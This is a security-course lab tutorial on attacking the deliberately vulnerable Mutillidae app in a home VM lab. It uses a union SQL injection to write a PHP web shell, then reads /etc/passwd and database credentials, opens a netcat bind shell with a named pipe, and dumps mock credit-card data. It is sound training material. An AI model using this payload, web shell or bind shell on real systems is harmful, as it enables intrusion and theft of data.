ComputerSecurityStudent (CSS) [Login] [Join Now]


|SECURITY TOOLS >> Mutillidae Project >> Mutillidae 2.5.11 >> Current Page |Views: 18457

(Mutillidae: Lesson 10)

{ SQL Injection Union Exploit #3 (Create PHP Execution Script) }

Section 0. Background Information
  • What is Mutillidae?
    • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.

  • What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

  • What is Netcat?
    • Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities. Netcat is often referred to as a "Swiss-army knife for TCP/IP".

  • Pre-Requisite Lab
    1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
      • Note: Remote database access has been turned on to provide an additional vulnerability.
    2. BackTrack: Lesson 1: Installing BackTrack 5 R1
      • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
    3. Mutillidae: Lesson 8: SQL Injection Union Exploit #1
      • Note: This lab contains a detailed foundation surrounding the union exploit.

  • Lab Notes
    • In this lab we will do the following:
      1. Due to a purposeful bug in the user-info.php code, we will use a Union SQL Injection to create a PHP script that allows any user to execute commands local on the webserver.
      2. We will obtain database credentials.
      3. We will create a netcat session using the execute_command.php backdoor script.
      4. We will obtain pretend credit card information.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2013 No content replication of any kind is allowed without express written permission.

     

Section 1: Configure Fedora14 Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit Fedora Mutillidae Virtual Machine Settings
    • Instructions:
      1. Highlight Fedora14 - Mutillidae
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click the OK Button

 

Section 2: Login to Fedora14 - Mutillidae
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14 - Mutillidae
      3. Play virtual machine

     

  2. Login to Fedora14 - Mutillidae
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

 

Section 3: Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal

     

  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>

     

  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes (FYI):
      • As indicated below, my IP address is 192.168.1.111.
      • Please record your IP address.

 

Section 4: Configure BackTrack Virtual Machine Settings
  1. Start VMware Player
    • Instructions
      1. For Windows 7
        1. Click Start Button
        2. Search for "vmware player"
        3. Click VMware Player
      2. For Windows XP
        • Starts --> Programs --> VMware Player

     

  2. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  3. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

 

Section 5: Play and Login to BackTrack
  1. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 6: Open Console Terminal and Retrieve IP Address
  1. On BackTrack, Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  2. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.109.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

     

Section 7: Database Union Explanation
  1. On Fedora 14 - Mutillidae
    • Notes (FYI):
      • Use your existing Terminal you opened in (Section 3, Step 1).
    • Instructions:
      1. su - root
      2. mysql -uroot -psamurai
      3. show databases;
      4. use nowasp;

     

  2. Show Tables
    • Instructions:
      1. show tables;
    • Notes (FYI):
      1. show tables, list all the tables in the particular DATABASE.

     

  3. Show Tables
    • Instructions:
      1. desc accounts;
    • Notes (FYI):
      1. desc accounts, show the accounts TABLE fields.
      2. The Mutillidae User Info Application uses this table.
      3. Notice it has 5 field.
      4. In order to complete a successful SQL union injection, it will need to include 5 fields.
      5. E.g., ' union select null,null,null,null,null' --

 

Section 8: Navigate to the User Info Page
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser

     

  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae

     

  3. Go to User Info
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info

 

Section 9: Inject Backdoor into User Info Page
  1. Inspect the Name Textbox with Firebug
    • Instructions:
      1. Right click on the Name Textbox
      2. Click on Inspect Element

     

  2. Change Text Box Size
    • Instructions:
      1. After the string "size=", Change 20 to 100. (See Picture)
      2. Click on the Close Button

     

  3. Backdoor Union SQL Union Injection
    • Instructions:
      1. In the Name Textbox place the following string.  Remember to put a space after the "-- ".
        • ' union select null,null,null,null,'<form action="" method="post" enctype="application/x-www-form-urlencoded"><input type="text" name="CMD" size="50"><input type="submit" value="Execute Command" /></form><?php echo "<pre>";echo shell_exec($_REQUEST["CMD"]);echo "</pre>"; ?>' INTO DUMPFILE '/var/www/html/mutillidae/execute_command.php' --
      2. Click the View Account Details button
    • Note(FYI):
      1. This above SQL union statement writes a small php script into the following location /var/www/mutillidae/execute_command.php.
      2. ' union select null,null,null,null,' - This is the start of SQL union injection statement, that includes the first four fields follow by the start of the fifth field (,').
      3. <form action="" method="post" enctype="application/x-www-form-urlencoded"><input type="text" name="CMD" size="50"><input type="submit" value="Execute Command" /></form> - This is the HTML Form.  Notice that the form action calls itself, since action is assigned to nothing (form action=""). 
      4. <?php echo "<pre>";echo shell_exec($_REQUEST["CMD"]);echo "</pre>"; ?> - This is the PHP script that execute whatever is placed in the input box (<input type="text" name="CMD") via a system call (shell_exec($_REQUEST["CMD"])).
      5. ' INTO DUMPFILE ' - This tells MySQL to place the HTML Form / PHP Script into a file.
      6. /var/www/html/mutillidae/execute_command.php - This is the output file.

     

  4. Viewing the Results
    • Note(FYI):
      1. This is a typical error message saying either a bad user name or password was supplied.
      2. Typically, web designers should not display what caused an error.  In this case, our HTML Form is displayed. 
      3. Another practice against web design is not to display the violation that caused the error in the results field. 

 

Section 10: Using the Backdoor for Basic Reconnaissance
  1. Initial Reconnaissance
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/execute_command.php
      2. whoami; pwd
        • whoami - Print the effective username.
        • pwd - print name of current/working directory.
      3. Click the Execute Command Button

     

  2. Who is Logged On
    • Instructions:
      1. w
      2. Click the Execute Command Button
    • Notes (FYI):
      1. w - Show who is logged on and what they are doing.
      2. Instead of letting brutessh attempt default usernames, now you can direct a potential attack at the student user.

     

  3. Exploring /etc/passwd
    • Instructions:
      1. cat /etc/passwd
      2. Click the Execute Command Button
    • Notes (FYI):
      1. /etc/passwd file stores essential information, which is required during login.  The /etc/passwd file contains the following fields:  Username, Password Existance, User ID, Group ID, Gecos, Home Directory, and Shell.
      2. Notice that mail, ftp, apache, ssh and mysql are all located in the /etc/passwd file.

     

  4. Network Reconnaissance
    • Instructions:
      1. netstat -nao | grep "0.0.0.0:"
      2. Click the Execute Command Button
    • Notes (FYI):
      1. 3306 - MySQL
      2. 22 - SSH
      3. 25 - SMTP (Mail)
      4. 631 - Internet Print Protocol

 

Section 11: Using the Backdoor for Database Reconnaissance
  1. Database Reconnaissance
    • Instructions:
      1. find * -name "*.php" | xargs grep -i "password" | grep "="
      2. Click the Execute Command Button
    • Notes (FYI):
      1. Find all files that end with a .php that contains the string password AND the string =.

     

  2. Display PHP Script File
    • Instructions:
      1. cat classes/MySQLHandler.php | grep -v "<?php"
      2. Click the Execute Command Button
    • Notes (FYI):
      1. In order to display a PHP script as a text file, you must remove the starting "<?php" tag.  If you do not remove the tag, then the web server will try to run the script instead of displaying the contents.

     

  3. View Database Authentication Attributes
    • Notes(FYI):
      1. Username: root
      2. Password: samurai
      3. Database Name: nowasp

 

Section 12: Using the Backdoor for Netcat Reconnaissance
  1. Netcat Reconnaissance
    • Instructions:
      1. which nc; netstat -nao | grep 4444 | wc -l
      2. Click the Execute Command Button
    • Notes (FYI):
      1. which nc, Where netcat located.
      2. netstat -nao | grep 4444 | wc -l,  show all network connections for port 4444, and count them.
      3. Note, you can run netcat on any port that is not being used.

     

  2. Execute Netcat
    • Instructions:
      1. mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
      2. Click the Execute Command Button
    • Notes (FYI):
      1. Make a FIFO named pipe.  A FIFO special file (a named pipe) is similar to a pipe, except that it is accessed as part of the file system. It can be opened by multiple processes for reading or writing. When processes are exchanging data via the FIFO, the kernel passes all data internally without writing it to the file system. Thus, the FIFO special file has no contents on the file system, the file system entry merely serves as a reference point so that processes can access the pipe using a name in the file system.
      2. Pipes allow separate processes to communicate without having been designed explicitly to work together.
      3. This will allow two processes to connect to netcat.
      4. nc -l 4444, tells netcat to listen and allow connections on port 4444.

     

  3. On BackTrack, Start up a "another" terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  4. Connect to Netcat
    • Notes(FYI):
      • Implement the following instructions on the BackTrack VM
      • Replace 192.168.1.111 with the Fedora(Mutillidae) IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. nc 192.168.1.111 4444
        • Use BackTrack to Connect to the Mutillidae Netcat session on port 4444
      2. hostname
        • This is server hostname that hosts Mutillidae.
      3. whoami
        • Print the effective UserID.
        • Ie., Who am I connected as.

     

  5. View Credit Card Information
    • Notes(FYI):
      • This step could have also been completed from the Command Execution PHP script.
      • You do not need netcat for this step.
    • Instructions:
      1. echo "show databases;" | mysql -uroot -psamurai
      2. echo "use nowasp; show tables;" | mysql -uroot -psamurai
      3. echo "select * from nowasp.credit_cards;" | mysql -uroot -psamurai

 

Section 13: Proof of Lab
  1. Proof of Lab, (On a BackTrack Terminal)
    • Notes(FYI):
      1. Replace 192.168.1.111 in the below URL with your Mutillidae's IP Address obtained from (Section 3, Step 3).
      2. Pay attention to #3 and #4 concerning which process ID to grep for.
    • Instructions:
      1. nc 192.168.1.111 4444
      2. netstat -naop | grep 4444
      3. ps -eaf | grep 8267 | grep -v grep
        • Replace 8267 with the process ID associated with port 4444.
      4. ps -eaf | grep 8264 | grep -v grep
        • Replace 8264 with the process ID  associated with "nc -l 4444".
      5. date
      6. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press both the <Ctrl> and <Alt> keys at the same time.
      2. Do a <PrtScn>
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth